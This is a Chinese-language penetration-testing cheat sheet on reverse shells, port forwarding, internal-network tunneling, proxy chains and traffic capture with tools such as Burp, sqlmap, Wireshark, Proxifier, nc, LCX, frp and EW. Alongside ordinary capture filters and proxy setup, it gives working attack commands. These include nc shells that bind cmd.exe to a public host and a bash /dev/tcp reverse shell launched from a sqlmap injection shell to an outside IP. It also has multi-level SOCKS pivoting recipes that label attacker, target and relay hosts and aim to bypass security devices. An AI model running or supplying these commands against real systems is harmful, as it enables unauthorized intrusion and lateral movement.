shell反弹/端口转发/端口映射/内网穿透/代理/SSH中转/协议转换/DNS防污染/抓包
burp直接抓取windows微信小程序与公众号数据包
https://www.bilibili.com/video/av79384091/
burpsuite
代理工具 Proxifier -设置代理链
- 导入注入字典爆破
- 导入sqlmap插件使用
- 配置log日志批量 - sqlmap.py -l burp.log --batch -smart --level <= 5 --risk <=3
结果以csv格式保存在.sqlmap/output 日志过滤工具 - BurpLogFilter-master
WireSHark
用途 可行 不可行 查看封包 修改、发送封包、不能解密HTTPS,所以wireshark看不懂HTTPS中的内容 过滤: tcp.srcport == 80 tcp协议80端口 ip.src ==192.168.1.102 显示源地址为192.168.1.102 ip.dst==192.168.1.102 目标地址为192.168.1.102 ip.src ==192.168.1.102 or ip.dst==192.168.1.102 源地址或者目标地址是192.168.1.102 http.request.method=="GET" 显示Get请求 http:cookie 捕获含有cookie的数据包 可获取信息 服务器ip/开放端口/操作系统版本/数据库类型/连接的数据库名称
Fiddler
抓本地 带上端口如:localhost:8080
tcpdump
tcpdump -i eth0 -w /home/linger/ip_18.cap
proxifier
支持Windows XP/Vista/Win7/Win10 和 MacOS,支持http/https、socks4/5、TCP、UDP等协议,可以指定端口,指定IP,指定域名、指定程序、指定用户名密码授权等运行模式
1.proxifier + ssr实现全局代理
(1)
-
点击Proxy Server按钮
-
add
-
输入本地shadowshocks的ip(默认127.0.0.1)和端口(默认1080)
-
选择SHOCKS Versin 5
-
然后点击check
-
OK - 显示Proxy is ready to work with Proxfier
(2)
- 点击Proxification Rule
- 选中localhost,点击Edit
- Target hosts处添加shadowshocks代理服务器的IP地址
- Action选择Direct(直连)
- OK - 此配置步骤允许发送到代理服务器的数据包通过,防止循环代理错误
(3)
- 点击Name Resolution
- 选择第二个Resolve hostnames through proxy(通过代理服务器解析域名)
- OK
(4)
检测:
(1)cmd -》 nslookup www.google.com
测试是否成功获取其IP地址
(2)访问www.ip138.com查看当前外网IP地址
2.proxifier + 夜游模拟器 + Burpsuite 实现APP流量抓包
(1)
设置Proxifier代理服务器,代理服务器设置为burp监听端口
(2)
设置代理规则,将`NoxVMHandle Frontend`进程对应的应用程序文件加入代理规则
(3)
将Burp的CA证书文件复制到模拟器安装 - 虚拟机都是用的虚拟网卡 不能直接访问到宿主机
(4)
proxifier中获取到模拟器内对应app的流量,模拟器的流量就全部走向Burp
nc
nc.exe -help #帮助 nc -lvp 4444 #监听端口 nc -t -e cmd.exe 公网主机ip 4444 #监听端口 nc -l -p 4444 -t -e cmd.exe #正向连接 nc -vv 远程主机ip 4444 #正向连接
结合SQLMap
nc –vv –l –p 8080
在sqlmap的shell段执行:
bash -i>& /dev/tcp/24.11.123.2xx/8080 0>&1
说明:
在24.11.123.2xx上执行上面的nc监听命令
24.11.123.2xx服务器需要对8080端口开放
LCX(Windows)/Portmap(Linux)
一:[Host2]可以联通[Host1]且[Host3]可以联通[Host1] || [Host2]主动连接[Host1]导致可绕过[Host2]机器上的安全设备
攻击机[Host3] 靶机[Host2] 中间机器[Host1]
1.[Host1]监听[POrt1]请求,并将来自[Port1]的请求传送给[Port2]
./portmap -m 2 -p1 [POrt1] -h2 127.0.0.1 (|| [IP]) -p2 Port[2](Linux)
lcx.exe –listen [Port1] [POrt2](Windows)
2.[Host2]连接[Host1]的[Port1] 并将[Port3]进行映射
./portmap -m 3 -h1 127.0.0.1(||[IP]) -p1 22 -h2 [Host1-IP] -p2 [Port1] (Linux)
lcx.exe -slave [Host1-IP] [Port1] 127.0.0.1(||[IP]) [Port3] (Windows)
3. [Host3]上执行连接命令
mstsc || ssh -> [Host2]:[POrt2]
二:[Host1]可以联通[Host2]且[Host3]可以联通[Host1]
攻击机[Host3] 靶机[Host2] 中间机器[Host1]
1.[Host1]上执行命令将[Host2]的[Port2]转发的[Host1]的[Port1] lcx -tran [Port1] [Host2-IP] [Port2] (Windwos)
2. [Host3]上执行连接命令
mstsc || ssh -> [HOst1]:[Port1]
frp
一:反向代理端口
服务端配置:frps.ini
[common]
bind_port = [Port1]
dashboard_user = xxx
dashboard_pwd = xxx
dashboard_port = [Port2]
客户端配置:frpc.ini
[common]
server_addr = [Server-IP]
server_port = [Port1]
[RDP]
type = tcp
local_ip = 127.0.0.1
local_port = [Port3](3389)
remote_port = [Port4]
nps
工具 Tunna、reDuh
netsh
ss
proxychains
支持socks通信
PortTran
Proxy-Go
https://github.com/snail007/goproxy
内网-》外网实现穿透
花生壳
Ngrok
EW
./ew -s ssocksd -l 1080 #正向 SOCKS v5 服务器 反弹 SOCKS v5 服务器: $ ./ew -s rcsocks -l 1080 -e 8888 #公网 ip 的主机上运行 $ ./ew -s rssocks -d 1.1.1.1 -e 8888 #在目标主机上启动 SOCKS v5 服务并反弹到公网主机的 8888端口 多级级联 $ ./ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 $ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999 lcx_tran $ ./ew -s ssocksd -l 9999 $ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 lcx_listen、lcx_slave $ ./ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s ssocksd -l 9999 $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 三级级联的本地SOCKS $ ./ew -s rcsocks -l 1080 -e 8888 $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 $ ./ew -s lcx_listen -l 9999 -e 7777 $ ./ew -s rssocks -d 127.0.0.1 -e 7777
Termite
reGeorg
Proxy Tools
https://github.com/Hackplayers/4nonimizer https://github.com/susmithHCK/torghost https://github.com/flagellantX/tor-with-privoxy https://dotvpn.com/en/
https://github.com/shadow1ng/ProxyPool
ProxyPool